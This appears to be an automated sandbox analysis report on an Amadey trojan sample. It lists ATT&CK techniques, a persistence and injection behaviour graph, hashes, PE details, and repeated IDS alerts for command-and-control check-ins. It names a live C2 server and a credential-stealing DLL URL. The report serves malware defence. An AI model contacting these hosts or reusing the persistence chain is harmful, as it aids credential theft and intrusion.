    Valid Accounts1
    Scheduled Task/Job
    1
    Scheduled Task/Job
    111
    Process Injection
    1
    Masquerading
    1
    Input Capture
    2
    System Time Discovery
    Remote Services1
    Screen Capture
    Exfiltration Over Other Network Medium1
    Encrypted Channel
    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsScheduled Task/Job1
    Registry Run Keys / Startup Folder
    1
    Scheduled Task/Job
    1
    Modify Registry
    LSASS Memory12
    Security Software Discovery
    Remote Desktop Protocol1
    Input Capture
    Exfiltration Over Bluetooth4
    Ingress Tool Transfer
    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)1
    Registry Run Keys / Startup Folder
    11
    Virtualization/Sandbox Evasion
    Security Account Manager11
    Virtualization/Sandbox Evasion
    SMB/Windows Admin Shares1
    Archive Collected Data
    Automated Exfiltration3
    Non-Application Layer Protocol
    Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)111
    Process Injection
    NTDS1
    Process Discovery
    Distributed Component Object ModelInput CaptureScheduled Transfer13
    Application Layer Protocol
    SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
    Deobfuscate/Decode Files or Information
    LSA Secrets1
    Account Discovery
    SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.common2
    Obfuscated Files or Information
    Cached Domain Credentials1
    System Owner/User Discovery
    VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup Items2
    Software Packing
    DCSync2
    File and Directory Discovery
    Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem24
    System Information Discovery
    Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 signatures2 2 Behavior Graph ID: 652395 Sample: yIF7nMz573.exe Startdate: 26/06/2022 Architecture: WINDOWS Score: 100 43 Snort IDS alert for network traffic 2->43 45 Multi AV Scanner detection for domain / URL 2->45 47 Antivirus detection for URL or domain 2->47 49 4 other signatures 2->49 8 yIF7nMz573.exe 3 2->8         started        12 bguuwe.exe 2->12         started        14 bguuwe.exe 2->14         started        process3 file4 31 C:\Users\user\AppData\Local\...\bguuwe.exe, PE32 8->31 dropped 53 Detected unpacking (changes PE section rights) 8->53 55 Detected unpacking (overwrites its own PE header) 8->55 57 Contains functionality to inject code into remote processes 8->57 16 bguuwe.exe 16 8->16         started        signatures5 process6 dnsIp7 33 185.215.113.15, 49742, 49743, 49744 WHOLESALECONNECTIONSNL Portugal 16->33 35 Multi AV Scanner detection for dropped file 16->35 37 Detected unpacking (changes PE section rights) 16->37 39 Detected unpacking (overwrites its own PE header) 16->39 41 2 other signatures 16->41 20 cmd.exe 1 16->20         started        22 schtasks.exe 1 16->22         started        signatures8 process9 process10 24 reg.exe 1 20->24         started        27 conhost.exe 20->27         started        29 conhost.exe 22->29         started        signatures11 51 Creates an undocumented autostart registry key 24->51

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    yIF7nMz573.exe37%VirustotalBrowse
    yIF7nMz573.exe46%ReversingLabsWin32.Trojan.DllCheck
    yIF7nMz573.exe100%Joe Sandbox ML
    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe100%Joe Sandbox ML
    C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe46%ReversingLabsWin32.Trojan.DllCheck
    SourceDetectionScannerLabelLinkDownload
    0.3.yIF7nMz573.exe.e40000.0.unpack100%AviraHEUR/AGEN.1215503Download File
    10.3.bguuwe.exe.2680000.0.unpack100%AviraHEUR/AGEN.1215503Download File
    1.3.bguuwe.exe.f10000.0.unpack100%AviraHEUR/AGEN.1215503Download File
    0.2.yIF7nMz573.exe.400000.0.unpack100%AviraHEUR/AGEN.1237910Download File
    19.2.bguuwe.exe.dc0e67.1.unpack100%AviraHEUR/AGEN.1215503Download File
    0.2.yIF7nMz573.exe.cb0e67.1.unpack100%AviraHEUR/AGEN.1215503Download File
    19.3.bguuwe.exe.1010000.0.unpack100%AviraHEUR/AGEN.1215503Download File
    10.2.bguuwe.exe.ca0e67.1.unpack100%AviraHEUR/AGEN.1215503Download File
    19.2.bguuwe.exe.400000.0.unpack100%AviraHEUR/AGEN.1237910Download File
    10.2.bguuwe.exe.400000.0.unpack100%AviraHEUR/AGEN.1237910Download File
    No Antivirus matches
    SourceDetectionScannerLabelLink
    http://185.215.113.15/Lkb2dxj3/cred.dll11%VirustotalBrowse
    http://185.215.113.15/Lkb2dxj3/cred.dll100%Avira URL Cloudmalware
    http://185.215.113.15/Lkb2dxj3/index.php?scr=117%VirustotalBrowse
    http://185.215.113.15/Lkb2dxj3/index.php?scr=1100%Avira URL Cloudmalware
    http://185.215.113.15/Lkb2dxj3/index.php8%VirustotalBrowse
    http://185.215.113.15/Lkb2dxj3/index.php100%Avira URL Cloudmalware
    185.215.113.15/Lkb2dxj3/index.php100%Avira URL Cloudmalware
    No contacted domains info
    NameMaliciousAntivirus DetectionReputation
    http://185.215.113.15/Lkb2dxj3/cred.dlltrue
    • 11%, Virustotal, Browse
    • Avira URL Cloud: malware
    unknown
    http://185.215.113.15/Lkb2dxj3/index.php?scr=1true
    • 17%, Virustotal, Browse
    • Avira URL Cloud: malware
    unknown
    http://185.215.113.15/Lkb2dxj3/index.phptrue
    • 8%, Virustotal, Browse
    • Avira URL Cloud: malware
    unknown
    185.215.113.15/Lkb2dxj3/index.phptrue
    • Avira URL Cloud: malware
    low
    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs
    IPDomainCountryFlagASNASN NameMalicious
    185.215.113.15
    unknownPortugal
    206894WHOLESALECONNECTIONSNLtrue
    Joe Sandbox Version:35.0.0 Citrine
    Analysis ID:652395
    Start date and time: 26/06/202209:45:342022-06-26 09:45:34 +02:00
    Joe Sandbox Product:CloudBasic
    Overall analysis duration:0h 10m 13s
    Hypervisor based Inspection enabled:false
    Report type:light
    Sample file name:yIF7nMz573.exe
    Cookbook file name:default.jbs
    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
    Number of analysed new started processes analysed:26
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • HDC enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Detection:MAL
    Classification:mal100.troj.evad.winEXE@13/3@0/1
    EGA Information:
    • Successful, ratio: 100%
    HDC Information:Failed
    HCA Information:
    • Successful, ratio: 98%
    • Number of executed functions: 0
    • Number of non-executed functions: 0
    Cookbook Comments:
    • Found application associated with file extension: .exe
    • Adjust boot time
    • Enable AMSI
    • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
    • TCP Packets have been reduced to 100
    • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
    • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
    • Not all processes where analyzed, report is missing behavior information
    • Report creation exceeded maximum time and may have missing disassembly code information.
    • Report size exceeded maximum capacity and may have missing network information.
    • Report size getting too big, too many NtDeviceIoControlFile calls found.
    • Report size getting too big, too many NtOpenKeyEx calls found.
    • Report size getting too big, too many NtQueryValueKey calls found.
    TimeTypeDescription
    09:46:51API Interceptor2360x Sleep call for process: bguuwe.exe modified
    09:46:53Task SchedulerRun new task: bguuwe.exe path: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe
    No context
    No context
    No context
    No context
    No context
    Process:C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe
    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
    Category:dropped
    Size (bytes):95220
    Entropy (8bit):7.918649658368608
    Encrypted:false
    SSDEEP:1536:CMhgLEkW/50z3KBo0OWKPkuzQugrNyCdsRwzUQ8+HUQhjWRZ95/fVMzW3rs4V/oV:lhHkWx0zyjKTzQDdsvQQfVMzmr1/E
    MD5:3A84660401E612C2322E89C892946CA5
    SHA1:7ED38353BE6606E17997B21E9CBEDFFACD38385A
    SHA-256:0A39DCA0020CF1A5E3B0800E546DD1206EDE363209971B09D98B260247005385
    SHA-512:87A2A3AF0E1C1FECB44019D08314503F137EADC00BCE0D550FFD8D6C4BB3BE6B4FB4C7528862ECB1D8E1C80647A8BF0DBDDFACF95EE60FAFD38DCFB29F3B7235
    Malicious:false
    Reputation:low
    Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\...x....Mj}9oE...7....*......]..(...x..:.e...+..6..r.....#XP.Q^(.*uz.........G...V_.~....3.c.o.?g.......z.8...Q...9(.Z.'.C...U...5..+....)h...i)M.,c.%{$.....x..=.Yp..%5~...f?......<.......GR.....:).d.....3/.H.....Z..+Z..|.7..A.m.c..;g...]..n..3.Ft..(.KI]&b.QE.&(.._.C.....B...-..h.Dh......{..J*.qNN...Z......?......................./.H.v..O.|......I"]Z.
    Process:C:\Users\user\Desktop\yIF7nMz573.exe
    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
    Category:dropped
    Size (bytes):366080
    Entropy (8bit):7.206487159159595
    Encrypted:false
    SSDEEP:6144:LSdUnaLFGk01lHybFuN0O4tCZa5bIBur00I1caYxjn+FPUBqVYehA:OmniGFlHOAN05tC6MBuQ0IQhn+FsBqak
    MD5:DCE2A8F4AB60879898A21AB451CAD63F
    SHA1:C889640843424E5EE1C6A7E31D25E3FA510B846B
    SHA-256:2BE50564951116CA5AC96158ABDB936B6D5BD35794330371131F4117223CDD26
    SHA-512:76CCDED319F6425843A60262013267A66CA3669D3BC8F42652B6CF11D46DA10598E3EC985606CB3A10701105D85B13A682F29E7A7EE8B9926278B00AA363ED49
    Malicious:true
    Antivirus:
    • Antivirus: Joe Sandbox ML, Detection: 100%
    • Antivirus: ReversingLabs, Detection: 46%
    Reputation:low
    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-\..i=..i=..i=...r..h=..wo..v=..wo...=..N...j=..i=...=..wo..V=..wo..h=..wo..h=..Richi=..........................PE..L...j..a......................q..............0....@...........................t.....g...........................................(.....t..?..........................P..................................@............................................text............................... ..`.data....)q..0...8..................@....sez....K....`t......R..............@....yasufo.J....pt......T..............@....rsrc....?....t..@...V..............@..@........................................................................................................................................................................................................................................................................................................................
    Process:C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe
    File Type:HTML document, ASCII text
    Category:dropped
    Size (bytes):276
    Entropy (8bit):5.243580622568483
    Encrypted:false
    SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoIR+knlTamcXaoD:J0+oxBeRmR9etdzRxGezH0qlZma+
    MD5:ED87E93DB5A2DC3D25A0C9C4D6D91CDC
    SHA1:CBC46DC3804EAE9D2F6CDBE650B4AE817B26EDFD
    SHA-256:52268E5929FC4D2F0E2EB8D097AC90B136DF895FE5B5F91A38F34AFBD58A513A
    SHA-512:6A7D4BFC704249588544AC92C7E74AFFCE91886CF01D1BBE64A554B95BEBC3F3AC87DCB1403C899C77DF9D4457615F033ADA1D6832678D42A45EA416FF0A66E1
    Malicious:false
    Reputation:low
    Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<hr>.<address>Apache/2.4.41 (Ubuntu) Server at 185.215.113.15 Port 80</address>.</body></html>.
    File type:PE32 executable (GUI) Intel 80386, for MS Windows
    Entropy (8bit):7.206487159159595
    TrID:
    • Win32 Executable (generic) a (10002005/4) 99.96%
    • Generic Win/DOS Executable (2004/3) 0.02%
    • DOS Executable Generic (2002/1) 0.02%
    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
    File name:yIF7nMz573.exe
    File size:366080
    MD5:dce2a8f4ab60879898a21ab451cad63f
    SHA1:c889640843424e5ee1c6a7e31d25e3fa510b846b
    SHA256:2be50564951116ca5ac96158abdb936b6d5bd35794330371131f4117223cdd26
    SHA512:76ccded319f6425843a60262013267a66ca3669d3bc8f42652b6cf11d46da10598e3ec985606cb3a10701105d85b13a682f29e7a7ee8b9926278b00aa363ed49
    SSDEEP:6144:LSdUnaLFGk01lHybFuN0O4tCZa5bIBur00I1caYxjn+FPUBqVYehA:OmniGFlHOAN05tC6MBuQ0IQhn+FsBqak
    TLSH:8574BF10FA90C431F1F712F449BA9668B92E7AA1572494CF53D56AEE4738AE4FC3130B
    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-\..i=..i=..i=...r..h=..wo..v=..wo...=..N...j=..i=...=..wo..V=..wo..h=..wo..h=..Richi=..........................PE..L...j..a...
    Icon Hash:aedaae9ecea62aa2
    Entrypoint:0x40eec0
    Entrypoint Section:.text
    Digitally signed:false
    Imagebase:0x400000
    Subsystem:windows gui
    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
    DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
    Time Stamp:0x6104AC6A [Sat Jul 31 01:50:34 2021 UTC]
    TLS Callbacks:
    CLR (.Net) Version:
    OS Version Major:5
    OS Version Minor:0
    File Version Major:5
    File Version Minor:0
    Subsystem Version Major:5
    Subsystem Version Minor:0
    Import Hash:9708e7dbb84fb2e34dfb5e05eada89dd
    Instruction
    mov edi, edi
    push ebp
    mov ebp, esp
    call 00007F584475660Bh
    call 00007F5844748F76h
    pop ebp
    ret
    int3
    int3
    int3
    int3
    int3
    int3
    int3
    int3
    int3
    int3
    int3
    int3
    int3
    int3
    int3
    mov edi, edi
    push ebp
    mov ebp, esp
    push FFFFFFFEh
    push 00430CA0h
    push 00412510h
    mov eax, dword ptr fs:[00000000h]
    push eax
    add esp, FFFFFF94h
    push ebx
    push esi
    push edi
    mov eax, dword ptr [0045548Ch]
    xor dword ptr [ebp-08h], eax
    xor eax, ebp
    push eax
    lea eax, dword ptr [ebp-10h]
    mov dword ptr fs:[00000000h], eax
    mov dword ptr [ebp-18h], esp
    mov dword ptr [ebp-70h], 00000000h
    mov dword ptr [ebp-04h], 00000000h
    lea eax, dword ptr [ebp-60h]
    push eax
    call dword ptr [004010DCh]
    mov dword ptr [ebp-04h], FFFFFFFEh
    jmp 00007F5844748F88h
    mov eax, 00000001h
    ret
    mov esp, dword ptr [ebp-18h]
    mov dword ptr [ebp-78h], 000000FFh
    mov dword ptr [ebp-04h], FFFFFFFEh
    mov eax, dword ptr [ebp-78h]
    jmp 00007F58447490B8h
    mov dword ptr [ebp-04h], FFFFFFFEh
    call 00007F58447490F4h
    mov dword ptr [ebp-6Ch], eax
    push 00000001h
    call 00007F58447576CAh
    add esp, 04h
    test eax, eax
    jne 00007F5844748F6Ch
    push 0000001Ch
    call 00007F58447490ACh
    add esp, 04h
    call 00007F5844750CF4h
    test eax, eax
    jne 00007F5844748F6Ch
    push 00000010h
    Programming Language:
    • [ASM] VS2008 build 21022
    • [ C ] VS2008 build 21022
    • [IMP] VS2005 build 50727
    • [C++] VS2008 build 21022
    • [RES] VS2008 build 21022
    • [LNK] VS2008 build 21022
    NameVirtual AddressVirtual Size Is in Section
    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
    IMAGE_DIRECTORY_ENTRY_IMPORT0x313bc0x28.text
    IMAGE_DIRECTORY_ENTRY_RESOURCE0x7480000x3f98.rsrc
    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
    IMAGE_DIRECTORY_ENTRY_DEBUG0x13500x1c.text
    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb2f00x40.text
    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
    IMAGE_DIRECTORY_ENTRY_IAT0x10000x2fc.text
    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
    .text0x10000x315ac0x31600False0.4516465585443038data6.387563290024678IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    .data0x330000x7129a80x23800unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
    .sez0x7460000x4b0x200False0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
    .yasufo0x7470000x4a0x200False0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
    .rsrc0x7480000x3f980x4000False0.7305908203125data6.33601075142428IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
    NameRVASizeTypeLanguageCountry
    RT_ICON0x7481f00x25a8dataKoreanNorth Korea
    RT_ICON0x7481f00x25a8dataKoreanSouth Korea
    RT_ICON0x74a7980x10a8dataKoreanNorth Korea
    RT_ICON0x74a7980x10a8dataKoreanSouth Korea
    RT_STRING0x74b9180x42dataKoreanNorth Korea
    RT_STRING0x74b9180x42dataKoreanSouth Korea
    RT_STRING0x74b9600x4aedataKoreanNorth Korea
    RT_STRING0x74b9600x4aedataKoreanSouth Korea
    RT_STRING0x74be100x188dataKoreanNorth Korea
    RT_STRING0x74be100x188dataKoreanSouth Korea
    RT_ACCELERATOR0x74b8a80x70dataKoreanNorth Korea
    RT_ACCELERATOR0x74b8a80x70dataKoreanSouth Korea
    RT_ACCELERATOR0x74b8680x40dataKoreanNorth Korea
    RT_ACCELERATOR0x74b8680x40dataKoreanSouth Korea
    RT_GROUP_ICON0x74b8400x22dataKoreanNorth Korea
    RT_GROUP_ICON0x74b8400x22dataKoreanSouth Korea
    DLLImport
    KERNEL32.dllDebugBreakProcess, FindFirstChangeNotificationW, GetNamedPipeHandleStateW, CreateIoCompletionPort, FillConsoleOutputCharacterW, DisableThreadLibraryCalls, TerminateProcess, GetProcessId, VerifyVersionInfoW, EnumDateFormatsW, FindNextFileW, CopyFileExA, BuildCommDCBAndTimeoutsA, VirtualUnlock, WriteProfileStringW, VerifyVersionInfoA, SetProcessPriorityBoost, GetDriveTypeW, FindFirstChangeNotificationA, GetFileType, DeleteFileA, FindNextVolumeMountPointA, OutputDebugStringA, ResetWriteWatch, WriteConsoleInputA, WriteConsoleInputW, GetConsoleTitleW, SetComputerNameExW, SetTimeZoneInformation, LoadLibraryA, GetSystemDirectoryA, GetDriveTypeA, GetShortPathNameW, ActivateActCtx, GetProfileSectionA, DeleteFileW, GetCommandLineW, InterlockedIncrement, AddRefActCtx, FindResourceA, FormatMessageA, GetModuleFileNameW, CreateJobObjectW, InitializeCriticalSection, SetFirmwareEnvironmentVariableW, GetDllDirectoryW, GetExitCodeThread, WritePrivateProfileStringW, GetConsoleAliasesLengthW, WriteProfileSectionW, AddAtomA, InterlockedDecrement, GetVersionExA, HeapSize, _hwrite, GetStartupInfoA, DisconnectNamedPipe, GetCPInfoExW, GetSystemWow64DirectoryW, GetPrivateProfileIntA, GetConsoleAliasExesW, DebugBreak, EndUpdateResourceW, SetLastError, InterlockedExchangeAdd, GetStringTypeExW, DeleteVolumeMountPointW, OpenFileMappingA, SetDefaultCommConfigW, lstrcpyA, TerminateThread, GetACP, _lwrite, GetQueuedCompletionStatus, GetNamedPipeHandleStateA, GetDiskFreeSpaceExW, RemoveVectoredExceptionHandler, WriteConsoleW, VirtualProtect, ReadConsoleOutputW, SetThreadContext, BuildCommDCBA, ReleaseActCtx, GetHandleInformation, WritePrivateProfileSectionW, DeleteCriticalSection, GetFileAttributesA, OpenWaitableTimerW, GetVolumePathNameW, SetConsoleMode, HeapSetInformation, SetComputerNameA, FindNextFileA, SetEvent, UnlockFile, GetProcAddress, DeleteTimerQueueTimer, CopyFileW, MoveFileA, GlobalAlloc, GetCommMask, SetFileShortNameA, GetFileAttributesW, FreeEnvironmentStringsW, GetProfileStringA, GetConsoleTitleA, SetComputerNameW, GetConsoleAliasesW, CreateMailslotA, EnumDateFormatsA, GetTimeZoneInformation, SetConsoleOutputCP, GetFileInformationByHandle, SetLocalTime, CallNamedPipeA, GetConsoleAliasExesLengthW, GetCurrentActCtx, OpenSemaphoreW, GetModuleHandleExA, LoadLibraryW, FoldStringW, GetTickCount, GetConsoleAliasesLengthA, GetLastError, LocalUnlock, GetFileTime, EnumResourceNamesW, OpenFileMappingW, UnhandledExceptionFilter, GetCompressedFileSizeW, GetThreadPriority, ReadConsoleA, AssignProcessToJobObject, Sleep, EnterCriticalSection, LeaveCriticalSection, RaiseException, RtlUnwind, GetCurrentProcess, SetUnhandledExceptionFilter, IsDebuggerPresent, WideCharToMultiByte, GetCommandLineA, HeapValidate, IsBadReadPtr, GetModuleHandleA, TlsGetValue, GetModuleHandleW, TlsAlloc, TlsSetValue, GetCurrentThreadId, TlsFree, GetStdHandle, WriteFile, OutputDebugStringW, ExitProcess, GetOEMCP, GetCPInfo, IsValidCodePage, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, GetEnvironmentStringsW, SetHandleCount, HeapDestroy, HeapCreate, HeapFree, VirtualFree, FlushFileBuffers, GetConsoleCP, GetConsoleMode, HeapAlloc, HeapReAlloc, VirtualAlloc, InitializeCriticalSectionAndSpinCount, MultiByteToWideChar, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, LCMapStringA, LCMapStringW, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, SetFilePointer, CloseHandle, CreateFileA
    Language of compilation systemCountry where language is spokenMap
    KoreanNorth Korea
    KoreanSouth Korea
    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
    192.168.2.3185.215.113.1549746802027700 06/26/22-09:46:57.610393TCP2027700ET TROJAN Amadey CnC Check-In4974680192.168.2.3185.215.113.15
    192.168.2.3185.215.113.1549749802027700 06/26/22-09:47:01.350218TCP2027700ET TROJAN Amadey CnC Check-In4974980192.168.2.3185.215.113.15
    192.168.2.3185.215.113.1549798802027700 06/26/22-09:47:41.864054TCP2027700ET TROJAN Amadey CnC Check-In4979880192.168.2.3185.215.113.15
    192.168.2.3185.215.113.1549832802027700 06/26/22-09:48:33.213243TCP2027700ET TROJAN Amadey CnC Check-In4983280192.168.2.3185.215.113.15
    192.168.2.3185.215.113.1549755802027700 06/26/22-09:47:21.773924TCP2027700ET TROJAN Amadey CnC Check-In4975580192.168.2.3185.215.113.15
    192.168.2.3185.215.113.1549826802027700 06/26/22-09:48:24.530301TCP2027700ET TROJAN Amadey CnC Check-In4982680192.168.2.3185.215.113.15
    192.168.2.3185.215.113.1549829802027700 06/26/22-09:48:27.114493TCP2027700ET TROJAN Amadey CnC Check-In4982980192.168.2.3185.215.113.15
    192.168.2.3185.215.113.1549841802027700 06/26/22-09:48:43.294919TCP2027700ET TROJAN Amadey CnC Check-In4984180192.168.2.3185.215.113.15
    192.168.2.3185.215.113.1549780802027700 06/26/22-09:47:27.628822TCP2027700ET TROJAN Amadey CnC Check-In4978080192.168.2.3185.215.113.15
    192.168.2.3185.215.113.1549767802027700 06/26/22-09:47:22.040844TCP2027700ET TROJAN Amadey CnC Check-In4976780192.168.2.3185.215.113.15
    192.168.2.3185.215.113.1549761802027700 06/26/22-09:47:20.297421TCP2027700ET TROJAN Amadey CnC Check-In4976180192.168.2.3185.215.113.15
    192.168.2.3185.215.113.1549801802027700 06/26/22-09:47:44.118576TCP2027700ET TROJAN Amadey CnC Check-In4980180192.168.2.3185.215.113.15
    192.168.2.3185.215.113.1549776802027700 06/26/22-09:47:25.997227TCP2027700ET TROJAN Amadey CnC Check-In4977680192.168.2.3185.215.113.15
    192.168.2.3185.215.113.1549810802027700 06/26/22-09:47:57.512185TCP2027700ET TROJAN Amadey CnC Check-In4981080192.168.2.3185.215.113.15
    192.168.2.3185.215.113.1549773802027700 06/26/22-09:47:23.164370TCP2027700ET TROJAN Amadey CnC Check-In4977380192.168.2.3185.215.113.15
    192.168.2.3185.215.113.1549758802027700 06/26/22-09:47:18.795200TCP2027700ET TROJAN Amadey CnC Check-In4975880192.168.2.3185.215.113.15
    192.168.2.3185.215.113.1549782802027700 06/26/22-09:47:29.252532TCP2027700ET TROJAN Amadey CnC Check-In4978280192.168.2.3185.215.113.15
    192.168.2.3185.215.113.1549756802027700 06/26/22-09:47:13.646635TCP2027700ET TROJAN Amadey CnC Check-In4975680192.168.2.3185.215.113.15
    192.168.2.3185.215.113.1549785802027700 06/26/22-09:47:30.265752TCP2027700ET TROJAN Amadey CnC Check-In4978580192.168.2.3185.215.113.15
    192.168.2.3185.215.113.1549828802027700 06/26/22-09:48:25.611929TCP2027700ET TROJAN Amadey CnC Check-In4982880192.168.2.3185.215.113.15
    192.168.2.3185.215.113.1549816802027700 06/26/22-09:48:09.646530TCP2027700ET TROJAN Amadey CnC Check-In4981680192.168.2.3185.215.113.15
    192.168.2.3185.215.113.1549845802027700 06/26/22-09:48:46.784890TCP2027700ET TROJAN Amadey CnC Check-In4984580192.168.2.3185.215.113.15
    192.168.2.3185.215.113.1549774802027700 06/26/22-09:47:24.256337TCP2027700ET TROJAN Amadey CnC Check-In4977480192.168.2.3185.215.113.15
    192.168.2.3185.215.113.1549839802027700 06/26/22-09:48:37.748469TCP2027700ET TROJAN Amadey CnC Check-In4983980192.168.2.3185.215.113.15
    192.168.2.3185.215.113.1549797802027700 06/26/22-09:47:41.469763TCP2027700ET TROJAN Amadey CnC Check-In4979780192.168.2.3185.215.113.15
    192.168.2.3185.215.113.1549817802027700 06/26/22-09:48:11.724189TCP2027700ET TROJAN Amadey CnC Check-In4981780192.168.2.3185.215.113.15
    192.168.2.3185.215.113.1549786802027700 06/26/22-09:47:30.623905TCP2027700ET TROJAN Amadey CnC Check-In4978680192.168.2.3185.215.113.15
    192.168.2.3185.215.113.1549745802027700 06/26/22-09:46:54.779771TCP2027700ET TROJAN Amadey CnC Check-In4974580192.168.2.3185.215.113.15
    192.168.2.3185.215.113.1549757802027700 06/26/22-09:47:16.401762TCP2027700ET TROJAN Amadey CnC Check-In4975780192.168.2.3185.215.113.15
    192.168.2.3185.215.113.1549823802027700 06/26/22-09:48:17.269325TCP2027700ET TROJAN Amadey CnC Check-In4982380192.168.2.3185.215.113.15
    192.168.2.3185.215.113.1549751802027700 06/26/22-09:47:05.409898TCP2027700ET TROJAN Amadey CnC Check-In4975180192.168.2.3185.215.113.15
    192.168.2.3185.215.113.1549781802027700 06/26/22-09:47:28.674122TCP2027700ET TROJAN Amadey CnC Check-In4978180192.168.2.3185.215.113.15
    192.168.2.3185.215.113.1549805802027700 06/26/22-09:47:48.812945TCP2027700ET TROJAN Amadey CnC Check-In4980580192.168.2.3185.215.113.15
    192.168.2.3185.215.113.1549775802027700 06/26/22-09:47:25.180668TCP2027700ET TROJAN Amadey CnC Check-In4977580192.168.2.3185.215.113.15
    192.168.2.3185.215.113.1549803802027700 06/26/22-09:47:47.323846TCP2027700ET TROJAN Amadey CnC Check-In4980380192.168.2.3185.215.113.15
    192.168.2.3185.215.113.1549812802027700 06/26/22-09:47:59.897990TCP2027700ET TROJAN Amadey CnC Check-In4981280192.168.2.3185.215.113.15
    192.168.2.3185.215.113.1549806802027700 06/26/22-09:47:54.097536TCP2027700ET TROJAN Amadey CnC Check-In4980680192.168.2.3185.215.113.15
